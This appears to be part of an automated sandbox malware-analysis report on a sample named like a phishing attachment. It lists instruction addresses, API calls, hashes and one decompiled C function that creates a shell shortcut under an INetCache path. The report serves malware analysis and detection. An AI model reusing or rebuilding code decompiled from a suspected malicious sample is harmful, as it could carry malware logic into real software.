                                                                                                                                                                                  0x10001fa7
                                                                                                                                                                                  0x10001faa
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001fac
                                                                                                                                                                                  0x10001fb3
                                                                                                                                                                                  0x10001fb3
                                                                                                                                                                                  0x10001fb9
                                                                                                                                                                                  0x10001fbc
                                                                                                                                                                                  0x10001fd8
                                                                                                                                                                                  0x10001fbe
                                                                                                                                                                                  0x10001fc7
                                                                                                                                                                                  0x10001fca
                                                                                                                                                                                  0x10001fca
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001fbc
                                                                                                                                                                                  0x10001f96
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001f96
                                                                                                                                                                                  0x10001f84
                                                                                                                                                                                  0x10001f87
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001f89
                                                                                                                                                                                  0x10001f8c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001f8c
                                                                                                                                                                                  0x10001c3a
                                                                                                                                                                                  0x10001c3a
                                                                                                                                                                                  0x10001c3b
                                                                                                                                                                                  0x10001d6a
                                                                                                                                                                                  0x10001d6a
                                                                                                                                                                                  0x10001d6f
                                                                                                                                                                                  0x10001d72
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001d7f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001f22
                                                                                                                                                                                  0x10001f25
                                                                                                                                                                                  0x10001f28
                                                                                                                                                                                  0x10001f28
                                                                                                                                                                                  0x10001f29
                                                                                                                                                                                  0x10001f2c
                                                                                                                                                                                  0x10001f2e
                                                                                                                                                                                  0x10001f30
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001f32
                                                                                                                                                                                  0x10001f32
                                                                                                                                                                                  0x10001f35
                                                                                                                                                                                  0x10001f47
                                                                                                                                                                                  0x10001f4a
                                                                                                                                                                                  0x10001f53
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001f53
                                                                                                                                                                                  0x10001f37
                                                                                                                                                                                  0x10001f37
                                                                                                                                                                                  0x10001f39
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001f3b
                                                                                                                                                                                  0x10001f3d
                                                                                                                                                                                  0x10001f3f
                                                                                                                                                                                  0x10001f3f
                                                                                                                                                                                  0x10001f3f
                                                                                                                                                                                  0x10001f40
                                                                                                                                                                                  0x10001f42
                                                                                                                                                                                  0x10001f44
                                                                                                                                                                                  0x10001f28
                                                                                                                                                                                  0x10001f29
                                                                                                                                                                                  0x10001f2c
                                                                                                                                                                                  0x10001f2e
                                                                                                                                                                                  0x10001f30
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001f30
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001dc6
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001dd2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001db9
                                                                                                                                                                                  0x10001dbd
                                                                                                                                                                                  0x10001dc1
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001ef4
                                                                                                                                                                                  0x10001ef8
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001efe
                                                                                                                                                                                  0x10001f06
                                                                                                                                                                                  0x10001f0d
                                                                                                                                                                                  0x10001f15
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001e91
                                                                                                                                                                                  0x10001e91
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001ddb
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001f72
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001f62
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001f66
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001f6e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001eb4
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001e99
                                                                                                                                                                                  0x10001e9b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001ebc
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001ea1
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001ea5
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001f6a
                                                                                                                                                                                  0x10001f74
                                                                                                                                                                                  0x10001f74
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001ec4
                                                                                                                                                                                  0x10001ec8
                                                                                                                                                                                  0x10001ecd
                                                                                                                                                                                  0x10001ed0
                                                                                                                                                                                  0x10001ed1
                                                                                                                                                                                  0x10001ed4
                                                                                                                                                                                  0x10001eda
                                                                                                                                                                                  0x10001eda
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001f5a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001ea9
                                                                                                                                                                                  0x10001eac
                                                                                                                                                                                  0x10001eae
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001de2
                                                                                                                                                                                  0x10001de2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001eb8
                                                                                                                                                                                  0x10001ebe
                                                                                                                                                                                  0x10001ebe
                                                                                                                                                                                  0x10001de4
                                                                                                                                                                                  0x10001de4
                                                                                                                                                                                  0x10001de7
                                                                                                                                                                                  0x10001dee
                                                                                                                                                                                  0x10001df1
                                                                                                                                                                                  0x10001df3
                                                                                                                                                                                  0x10001df5
                                                                                                                                                                                  0x10001df6
                                                                                                                                                                                  0x10001dfa
                                                                                                                                                                                  0x10001dfd
                                                                                                                                                                                  0x10001e03
                                                                                                                                                                                  0x10001e09
                                                                                                                                                                                  0x10001e09
                                                                                                                                                                                  0x10001e0b
                                                                                                                                                                                  0x10001e0b
                                                                                                                                                                                  0x10001e0e
                                                                                                                                                                                  0x10001e14
                                                                                                                                                                                  0x10001e16
                                                                                                                                                                                  0x10001e1a
                                                                                                                                                                                  0x10001e1f
                                                                                                                                                                                  0x10001e1f
                                                                                                                                                                                  0x10001e21
                                                                                                                                                                                  0x10001e21
                                                                                                                                                                                  0x10001e24
                                                                                                                                                                                  0x10001e27
                                                                                                                                                                                  0x10001e30
                                                                                                                                                                                  0x10001e33
                                                                                                                                                                                  0x10001e36
                                                                                                                                                                                  0x10001e36
                                                                                                                                                                                  0x10001e38
                                                                                                                                                                                  0x10001e3b
                                                                                                                                                                                  0x10001e41
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001e41
                                                                                                                                                                                  0x10001e05
                                                                                                                                                                                  0x10001e07
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001d86
                                                                                                                                                                                  0x10001d8c
                                                                                                                                                                                  0x10001d8f
                                                                                                                                                                                  0x10001d91
                                                                                                                                                                                  0x10001d91
                                                                                                                                                                                  0x10001d94
                                                                                                                                                                                  0x10001d98
                                                                                                                                                                                  0x10001da5
                                                                                                                                                                                  0x10001da7
                                                                                                                                                                                  0x10001dad
                                                                                                                                                                                  0x10001dad
                                                                                                                                                                                  0x10001dad
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001ee2
                                                                                                                                                                                  0x10001ee6
                                                                                                                                                                                  0x10001eeb
                                                                                                                                                                                  0x10001eee
                                                                                                                                                                                  0x10001e47
                                                                                                                                                                                  0x10001e47
                                                                                                                                                                                  0x10001e49
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001e4f
                                                                                                                                                                                  0x10001e4f
                                                                                                                                                                                  0x10001e53
                                                                                                                                                                                  0x10001e5a
                                                                                                                                                                                  0x10001e7e
                                                                                                                                                                                  0x10001e7e
                                                                                                                                                                                  0x10001e82
                                                                                                                                                                                  0x10001e84
                                                                                                                                                                                  0x10001e87
                                                                                                                                                                                  0x10001e87
                                                                                                                                                                                  0x10001e8a
                                                                                                                                                                                  0x10001e8a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001e82
                                                                                                                                                                                  0x10001e5f
                                                                                                                                                                                  0x10001e62
                                                                                                                                                                                  0x10001e62
                                                                                                                                                                                  0x10001e69
                                                                                                                                                                                  0x10001e6b
                                                                                                                                                                                  0x10001e6e
                                                                                                                                                                                  0x10001e75
                                                                                                                                                                                  0x10001e76
                                                                                                                                                                                  0x10001e7c
                                                                                                                                                                                  0x10001e7c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001e7c
                                                                                                                                                                                  0x10001e70
                                                                                                                                                                                  0x10001e73
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001d7f
                                                                                                                                                                                  0x10001c41
                                                                                                                                                                                  0x10001c41
                                                                                                                                                                                  0x10001c42
                                                                                                                                                                                  0x10001d67
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001d67
                                                                                                                                                                                  0x10001c48
                                                                                                                                                                                  0x10001c49
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001c51
                                                                                                                                                                                  0x10001c51
                                                                                                                                                                                  0x10001c54
                                                                                                                                                                                  0x10001c9f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001c9f
                                                                                                                                                                                  0x10001c56
                                                                                                                                                                                  0x10001c56
                                                                                                                                                                                  0x10001c59
                                                                                                                                                                                  0x10001c83
                                                                                                                                                                                  0x10001c86
                                                                                                                                                                                  0x10001c89
                                                                                                                                                                                  0x10001d59
                                                                                                                                                                                  0x10001d59
                                                                                                                                                                                  0x10001d59
                                                                                                                                                                                  0x10001c8f
                                                                                                                                                                                  0x10001c8f
                                                                                                                                                                                  0x10001c8f
                                                                                                                                                                                  0x10001d5f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001d5f
                                                                                                                                                                                  0x10001c5c
                                                                                                                                                                                  0x10001c5c
                                                                                                                                                                                  0x10001c5d
                                                                                                                                                                                  0x10001c80
                                                                                                                                                                                  0x10001c82
                                                                                                                                                                                  0x10001c82
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001c82
                                                                                                                                                                                  0x10001c5f
                                                                                                                                                                                  0x10001c5f
                                                                                                                                                                                  0x10001c62
                                                                                                                                                                                  0x10001c7c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001c7c
                                                                                                                                                                                  0x10001c64
                                                                                                                                                                                  0x10001c64
                                                                                                                                                                                  0x10001c67
                                                                                                                                                                                  0x10001c78
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001c78
                                                                                                                                                                                  0x10001c69
                                                                                                                                                                                  0x10001c69
                                                                                                                                                                                  0x10001c6a
                                                                                                                                                                                  0x10001c74
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001c74
                                                                                                                                                                                  0x10001c6d
                                                                                                                                                                                  0x10001c6e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001c70
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001c70
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001b20
                                                                                                                                                                                  0x10001ac3
                                                                                                                                                                                  0x10001ac6
                                                                                                                                                                                  0x10001af5
                                                                                                                                                                                  0x10001af9
                                                                                                                                                                                  0x10001b00
                                                                                                                                                                                  0x10001b07
                                                                                                                                                                                  0x10001b0a
                                                                                                                                                                                  0x10001b0d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001b0d
                                                                                                                                                                                  0x10001ac8
                                                                                                                                                                                  0x10001ac9
                                                                                                                                                                                  0x10001ae4
                                                                                                                                                                                  0x10001aeb
                                                                                                                                                                                  0x10001aee
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001aee
                                                                                                                                                                                  0x10001ace
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001ad4
                                                                                                                                                                                  0x10001ad4
                                                                                                                                                                                  0x10001adb
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001adb
                                                                                                                                                                                  0x10001ace
                                                                                                                                                                                  0x10001cc4
                                                                                                                                                                                  0x10001cc9
                                                                                                                                                                                  0x10001cce
                                                                                                                                                                                  0x10001cd2
                                                                                                                                                                                  0x100020ef
                                                                                                                                                                                  0x100020f5
                                                                                                                                                                                  0x10001ce4
                                                                                                                                                                                  0x10001ce6
                                                                                                                                                                                  0x10001ce7
                                                                                                                                                                                  0x1000201a
                                                                                                                                                                                  0x1000201a
                                                                                                                                                                                  0x1000201d
                                                                                                                                                                                  0x10002020
                                                                                                                                                                                  0x1000203d
                                                                                                                                                                                  0x10002043
                                                                                                                                                                                  0x10002045
                                                                                                                                                                                  0x1000204b
                                                                                                                                                                                  0x10002062
                                                                                                                                                                                  0x10002062
                                                                                                                                                                                  0x10002062
                                                                                                                                                                                  0x1000206f
                                                                                                                                                                                  0x10002075
                                                                                                                                                                                  0x10002078
                                                                                                                                                                                  0x1000207e
                                                                                                                                                                                  0x10002080
                                                                                                                                                                                  0x10002083
                                                                                                                                                                                  0x10002085
                                                                                                                                                                                  0x1000208c
                                                                                                                                                                                  0x10002091
                                                                                                                                                                                  0x10002094
                                                                                                                                                                                  0x10002096
                                                                                                                                                                                  0x1000209b
                                                                                                                                                                                  0x100020ad
                                                                                                                                                                                  0x100020ad
                                                                                                                                                                                  0x1000209b
                                                                                                                                                                                  0x10002094
                                                                                                                                                                                  0x10002083
                                                                                                                                                                                  0x100020b3
                                                                                                                                                                                  0x100020b6
                                                                                                                                                                                  0x100020c0
                                                                                                                                                                                  0x100020c8
                                                                                                                                                                                  0x100020d4
                                                                                                                                                                                  0x100020da
                                                                                                                                                                                  0x100020dd
                                                                                                                                                                                  0x1000200f
                                                                                                                                                                                  0x1000200f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x1000200f
                                                                                                                                                                                  0x100020e3
                                                                                                                                                                                  0x100020e9
                                                                                                                                                                                  0x100020e9
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x100020eb
                                                                                                                                                                                  0x100020eb
                                                                                                                                                                                  0x100020eb
                                                                                                                                                                                  0x100020eb
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x100020b8
                                                                                                                                                                                  0x100020b8
                                                                                                                                                                                  0x100020be
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x100020be
                                                                                                                                                                                  0x100020b6
                                                                                                                                                                                  0x1000204e
                                                                                                                                                                                  0x10002054
                                                                                                                                                                                  0x10002056
                                                                                                                                                                                  0x1000205c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x1000205c
                                                                                                                                                                                  0x10002022
                                                                                                                                                                                  0x10002029
                                                                                                                                                                                  0x1000202f
                                                                                                                                                                                  0x10002035
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10002035
                                                                                                                                                                                  0x10001ced
                                                                                                                                                                                  0x10001cee
                                                                                                                                                                                  0x10001ff9
                                                                                                                                                                                  0x10001ff9
                                                                                                                                                                                  0x10001fff
                                                                                                                                                                                  0x10002002
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10002009
                                                                                                                                                                                  0x1000200e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x1000200e
                                                                                                                                                                                  0x10001cf5
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001cfb
                                                                                                                                                                                  0x10001cfb
                                                                                                                                                                                  0x10001d04
                                                                                                                                                                                  0x10001d09
                                                                                                                                                                                  0x10001d0f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001d15
                                                                                                                                                                                  0x10001d22
                                                                                                                                                                                  0x10001d28
                                                                                                                                                                                  0x10001d32
                                                                                                                                                                                  0x10001d38
                                                                                                                                                                                  0x10001d40
                                                                                                                                                                                  0x10001d50
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001d50

                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 10001215: GlobalAlloc.KERNEL32(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,000014A4), ref: 10001B67
                                                                                                                                                                                  • lstrcpyA.KERNEL32(00000008,?), ref: 10001BAF
                                                                                                                                                                                  • lstrcpyA.KERNEL32(00000408,?), ref: 10001BB9
                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 10001BCC
                                                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 10001CC4
                                                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 10001CC9
                                                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 10001CCE
                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 10001E76
                                                                                                                                                                                  • lstrcpyA.KERNEL32(?,?), ref: 10001FCA
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11531499304.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11531472460.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11531531886.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11531564017.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_10000000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Global$Free$lstrcpy$Alloc
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4227406936-0
                                                                                                                                                                                  • Opcode ID: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
                                                                                                                                                                                  • Instruction ID: 780798ea066e4ece118e8e5fed0bf18c828ec290136deaf2e43fc5d0554b8685
                                                                                                                                                                                  • Opcode Fuzzy Hash: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 17129971D0424ADFFB20CFA4C8847EEBBF4FB043C4F61852AD5A1A2199DB749A81CB51
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 0040205E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 74%
                                                                                                                                                                                  			E0040205E() {
				signed int _t55;
				void* _t59;
				intOrPtr* _t63;
				intOrPtr _t64;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr* _t84;
				int _t87;
				intOrPtr* _t95;
				signed int _t105;
				signed int _t109;
				void* _t111;

				 *(_t111 - 0x34) = E00402A3A(0xfffffff0);
				 *(_t111 - 0xc) = E00402A3A(0xffffffdf);
				 *((intOrPtr*)(_t111 - 0x4c)) = E00402A3A(2);
				 *((intOrPtr*)(_t111 - 0x40)) = E00402A3A(0xffffffcd);
				 *((intOrPtr*)(_t111 - 0x38)) = E00402A3A(0x45);
				_t55 =  *(_t111 - 0x18);
				 *(_t111 - 0x44) = _t55 & 0x00000fff;
				_t105 = _t55 & 0x00008000;
				_t109 = _t55 >> 0x0000000c & 0x00000007;
				 *(_t111 - 0x3c) = _t55 >> 0x00000010 & 0x0000ffff;
				if(E0040580E( *(_t111 - 0xc)) == 0) {
					E00402A3A(0x21);
				}
				_t59 = _t111 + 8;
				__imp__CoCreateInstance(0x407514, _t87, "true", 0x407504, _t59);
				if(_t59 < _t87) {
					L15:
					 *((intOrPtr*)(_t111 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t63 =  *((intOrPtr*)(_t111 + 8));
					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x407524, _t111 - 0x30);
					 *((intOrPtr*)(_t111 - 8)) = _t64;
					if(_t64 >= _t87) {
						_t67 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
						if(_t105 == _t87) {
							_t84 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\sjoske\\Humlebier\\aesc\\Antioxidanttilskud\\Pellicularia\\Unillusioned");
						}
						if(_t109 != _t87) {
							_t82 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
						}
						_t69 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x3c));
						_t95 =  *((intOrPtr*)(_t111 - 0x40));
						if( *_t95 != _t87) {
							_t80 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x44));
						}
						_t71 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x4c)));
						_t73 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x38)));
						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x34), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
								_t78 =  *((intOrPtr*)(_t111 - 0x30));
								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), "true");
							}
						}
						_t75 =  *((intOrPtr*)(_t111 - 0x30));
						 *((intOrPtr*)( *_t75 + 8))(_t75);
					}
					_t65 =  *((intOrPtr*)(_t111 + 8));
					 *((intOrPtr*)( *_t65 + 8))(_t65);
					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
						_push(0xfffffff4);
					} else {
						goto L15;
					}
				}
				E00401423();
				 *0x42e488 =  *0x42e488 +  *((intOrPtr*)(_t111 - 4));
				return 0;
			}






















                                                                                                                                                                                  0x00402067
                                                                                                                                                                                  0x00402071
                                                                                                                                                                                  0x0040207b
                                                                                                                                                                                  0x00402085
                                                                                                                                                                                  0x00402090
                                                                                                                                                                                  0x00402093
                                                                                                                                                                                  0x004020ad
                                                                                                                                                                                  0x004020b0
                                                                                                                                                                                  0x004020b6
                                                                                                                                                                                  0x004020b9
                                                                                                                                                                                  0x004020c3
                                                                                                                                                                                  0x004020c7
                                                                                                                                                                                  0x004020c7
                                                                                                                                                                                  0x004020cc
                                                                                                                                                                                  0x004020dd
                                                                                                                                                                                  0x004020e5
                                                                                                                                                                                  0x004021bb
                                                                                                                                                                                  0x004021bb
                                                                                                                                                                                  0x004021c2
                                                                                                                                                                                  0x004020eb
                                                                                                                                                                                  0x004020eb
                                                                                                                                                                                  0x004020fa
                                                                                                                                                                                  0x004020fe
                                                                                                                                                                                  0x00402101
                                                                                                                                                                                  0x00402107
                                                                                                                                                                                  0x00402115
                                                                                                                                                                                  0x00402118
                                                                                                                                                                                  0x0040211a
                                                                                                                                                                                  0x00402125
                                                                                                                                                                                  0x00402125
                                                                                                                                                                                  0x0040212a
                                                                                                                                                                                  0x0040212c
                                                                                                                                                                                  0x00402133
                                                                                                                                                                                  0x00402133
                                                                                                                                                                                  0x00402136
                                                                                                                                                                                  0x0040213f
                                                                                                                                                                                  0x00402142
                                                                                                                                                                                  0x00402147
                                                                                                                                                                                  0x00402149
                                                                                                                                                                                  0x00402153
                                                                                                                                                                                  0x00402153
                                                                                                                                                                                  0x00402156
                                                                                                                                                                                  0x0040215f
                                                                                                                                                                                  0x00402162
                                                                                                                                                                                  0x0040216b
                                                                                                                                                                                  0x00402171
                                                                                                                                                                                  0x00402178
                                                                                                                                                                                  0x00402191
                                                                                                                                                                                  0x00402193
                                                                                                                                                                                  0x004021a1
                                                                                                                                                                                  0x004021a1
                                                                                                                                                                                  0x00402191
                                                                                                                                                                                  0x004021a4
                                                                                                                                                                                  0x004021aa
                                                                                                                                                                                  0x004021aa
                                                                                                                                                                                  0x004021ad
                                                                                                                                                                                  0x004021b3
                                                                                                                                                                                  0x004021b9
                                                                                                                                                                                  0x004021ce
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004021b9
                                                                                                                                                                                  0x004021c4
                                                                                                                                                                                  0x004028d2
                                                                                                                                                                                  0x004028de

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CoCreateInstance.OLE32(00407514,?,?,00407504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020DD
                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,?,00407504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402189
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\sjoske\Humlebier\aesc\Antioxidanttilskud\Pellicularia\Unillusioned, xrefs: 0040211D
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\sjoske\Humlebier\aesc\Antioxidanttilskud\Pellicularia\Unillusioned
                                                                                                                                                                                  • API String ID: 123533781-488347389
                                                                                                                                                                                  • Opcode ID: 2dc2b96a66f57c24b750db45e5506c73cf51cde49f126d2de88fdbea151c2965
                                                                                                                                                                                  • Instruction ID: 202bff00353f62e800299527826cf24c9a9ce8e01df6a73eade79aa1dd8fb932
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2dc2b96a66f57c24b750db45e5506c73cf51cde49f126d2de88fdbea151c2965
